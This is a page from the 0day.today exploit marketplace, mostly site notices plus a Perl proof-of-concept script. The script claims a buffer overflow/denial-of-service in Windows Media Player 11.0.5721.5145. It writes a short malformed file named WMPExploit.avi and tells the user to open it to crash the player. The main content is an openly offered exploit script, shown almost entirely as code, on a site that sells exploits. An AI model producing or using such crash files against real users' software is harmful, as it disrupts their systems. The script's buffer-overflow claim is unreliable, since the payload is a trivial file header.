0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows Media player 11.0.5721.5145 Buffer overflow/DOS
#!/usr/bin/perl #(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit #(+)Software : Windows Media player #(+)Version : 11.0.5721.5145 #(+)Tested On : WIN-XP SP3 #(+) Date : 31.03.2011 #(+) Hour : 13:37 #Similar Bug was found by cr4wl3r in MediaPlayer Classic system("color 6"); system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit"); print " _______________________________________________________________________ (+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit (+) Software : Windows Media player (+) Version : 11.0.5721.5145 (+) Tested On : WIN-XP SP3 (+) Date : 31.03.2011 (+) Hour : 13:37 PM ____________________________________________________________________\n "; sleep 2; system("cls"); system("color 2"); print "\nGenerating the exploit file !!!"; sleep 2; print "\n\nWMPExploit.avi file generated!!"; sleep 2; $theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; open(file, "> WMPExploit.avi"); print (file $theoverflow); print "\n\n(+) Done!\n (+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n (+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n"; sleep 3; system("cls"); sleep 1; system("color C"); print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r\n (+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n (+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n ########################################################################\n\n"; system("pause"); # 0day.today [2024-11-15] #